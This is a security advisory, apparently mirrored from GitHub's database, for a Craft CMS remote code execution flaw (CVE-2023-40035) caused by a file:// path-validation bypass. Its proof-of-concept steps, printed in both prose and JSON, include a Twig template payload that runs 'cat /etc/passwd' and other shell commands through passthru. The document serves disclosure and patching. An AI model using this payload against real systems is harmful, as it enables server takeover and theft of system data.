ghsa-44wr-rmwq-3phw
Vulnerability from github
Published
2023-08-21 19:58
Modified
2023-08-23 22:14
Summary
Craft CMS vulnerable to Remote Code Execution via validatePath bypass
Details

Summary

Bypassing the validatePath function can lead to potential Remote Code Execution (Post-authentication, ALLOW_ADMIN_CHANGES=true)

Details

In bootstrap.php, the SystemPaths path is set as below. ```php // Set the vendor path. By default assume that it's 4 levels up from here $vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(DIR, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/. $rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory $dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? "$rootPath/.env"; $configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? "$rootPath/config"; $contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? "$rootPath/migrations"; $storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? "$rootPath/storage"; $templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? "$rootPath/templates"; $translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? "$rootPath/translations"; $testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? "$rootPath/tests"; ```

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir() ```php /* * @param string $attribute * @param array|null $params * @param InlineValidator $validator * @return void * @since 4.4.6 / public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void { // Make sure it’s not within any of the system directories $path = FileHelper::absolutePath($this->getRootPath(), '/');

    $systemDirs = Craft::$app->getPath()->getSystemPaths();

    foreach ($systemDirs as $dir) {
        $dir = FileHelper::absolutePath($dir, '/');
        if (str_starts_with("$path/", "$dir/")) {
            $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
            break;
        }
    }
}

```

ref. https://www.php.net/manual/en/wrappers.file.php

PoC

1) Create a new filesystem. Base Path: file:///var/www/html/templates

1

2) Create a new asset volume. Asset Filesystem: local_bypass

2

3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates twig {{'<pre>'}} {{1337*1337}} {{['cat /etc/passwd']|map('passthru')|join}} {{['id;pwd;ls -altr /']|map('passthru')|join}} 3 4

4) Create a new route. URI: * , Template: poc.ttml

5

5) Confirm RCE on arbitrary path ( /* )

6

PoC Env

0628 env

Impact

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)

Show details on source website


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.4.14"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.4.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.8.14"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.8.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-40035"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-21T19:58:04Z",
    "nvd_published_at": "2023-08-23T21:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nBypassing the validatePath function can lead to potential Remote Code Execution\n(Post-authentication, ALLOW_ADMIN_CHANGES=true)\n\n### Details\n\nIn bootstrap.php, the SystemPaths path is set as below.\n```php\n// Set the vendor path. By default assume that it\u0027s 4 levels up from here\n$vendorPath = $findConfigPath(\u0027--vendorPath\u0027, \u0027CRAFT_VENDOR_PATH\u0027) ?? dirname(__DIR__, 3);\n\n// Set the \"project root\" path that contains config/, storage/, etc. By default assume that it\u0027s up a level from vendor/.\n$rootPath = $findConfigPath(\u0027--basePath\u0027, \u0027CRAFT_BASE_PATH\u0027) ?? dirname($vendorPath);\n\n// By default the remaining directories will be in the base directory\n$dotenvPath = $findConfigPath(\u0027--dotenvPath\u0027, \u0027CRAFT_DOTENV_PATH\u0027) ?? \"$rootPath/.env\";\n$configPath = $findConfigPath(\u0027--configPath\u0027, \u0027CRAFT_CONFIG_PATH\u0027) ?? \"$rootPath/config\";\n$contentMigrationsPath = $findConfigPath(\u0027--contentMigrationsPath\u0027, \u0027CRAFT_CONTENT_MIGRATIONS_PATH\u0027) ?? \"$rootPath/migrations\";\n$storagePath = $findConfigPath(\u0027--storagePath\u0027, \u0027CRAFT_STORAGE_PATH\u0027) ?? \"$rootPath/storage\";\n$templatesPath = $findConfigPath(\u0027--templatesPath\u0027, \u0027CRAFT_TEMPLATES_PATH\u0027) ?? \"$rootPath/templates\";\n$translationsPath = $findConfigPath(\u0027--translationsPath\u0027, \u0027CRAFT_TRANSLATIONS_PATH\u0027) ?? \"$rootPath/translations\";\n$testsPath = $findConfigPath(\u0027--testsPath\u0027, \u0027CRAFT_TESTS_PATH\u0027) ?? \"$rootPath/tests\";\n```\n\nBecause paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()\n```php\n    /**\n     * @param string $attribute\n     * @param array|null $params\n     * @param InlineValidator $validator\n     * @return void\n     * @since 4.4.6\n     */\n    public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void\n    {\n        // Make sure it\u2019s not within any of the system directories\n        $path = FileHelper::absolutePath($this-\u003egetRootPath(), \u0027/\u0027);\n\n        $systemDirs = Craft::$app-\u003egetPath()-\u003egetSystemPaths();\n\n        foreach ($systemDirs as $dir) {\n            $dir = FileHelper::absolutePath($dir, \u0027/\u0027);\n            if (str_starts_with(\"$path/\", \"$dir/\")) {\n                $validator-\u003eaddError($this, $attribute, Craft::t(\u0027app\u0027, \u0027Local volumes cannot be located within system directories.\u0027));\n                break;\n            }\n        }\n    }\n```\n\nref. https://www.php.net/manual/en/wrappers.file.php\n\n\n\n### PoC\n1) Create a new filesystem. **Base Path: file:///var/www/html/templates**\n\n![1](https://user-images.githubusercontent.com/30969523/249252853-5cde9bae-9279-428a-972b-d4444c545819.png)\n\n\n2) Create a new asset volume. Asset Filesystem: local_bypass\n\n![2](https://user-images.githubusercontent.com/30969523/249256711-e37da7f8-52d6-4ecc-bfc4-b9b9d8a2230d.png)\n\n\n3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates\n```twig\n{{\u0027\u003cpre\u003e\u0027}}\n{{1337*1337}}\n{{[\u0027cat /etc/passwd\u0027]|map(\u0027passthru\u0027)|join}}\n{{[\u0027id;pwd;ls -altr /\u0027]|map(\u0027passthru\u0027)|join}}\n```\n![3](https://user-images.githubusercontent.com/30969523/249256731-8dafc3dc-4937-4f69-bba0-97bc96be1ada.png)\n![4](https://user-images.githubusercontent.com/30969523/249257369-54e22aff-3919-4a21-b696-a7be74086ff9.png)\n\n\n4) Create a new route. URI: * , Template: poc.ttml\n\n![5](https://user-images.githubusercontent.com/30969523/249257437-972ec725-8197-4472-9b57-750ab91d9bfd.png)\n\n\n5) Confirm RCE on arbitrary path ( /* )\n\n![6](https://user-images.githubusercontent.com/30969523/249257465-061dbaf8-a2c6-4366-80f5-986a15bad748.png)\n\n\n#### PoC Env\n\n![0628 env](https://user-images.githubusercontent.com/30969523/249252784-6e5913ad-9ad1-4d3a-a70f-2c5ff9f55166.png)\n\n\n### Impact\nTake control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.\n\nalthough the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)\n",
  "id": "GHSA-44wr-rmwq-3phw",
  "modified": "2023-08-23T22:14:58Z",
  "published": "2023-08-21T19:58:04Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40035"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/0bd33861abdc60c93209cff03eeee54504d3d3b5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/3.8.15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/releases/tag/4.4.15"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Craft CMS vulnerable to Remote Code Execution via validatePath bypass"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.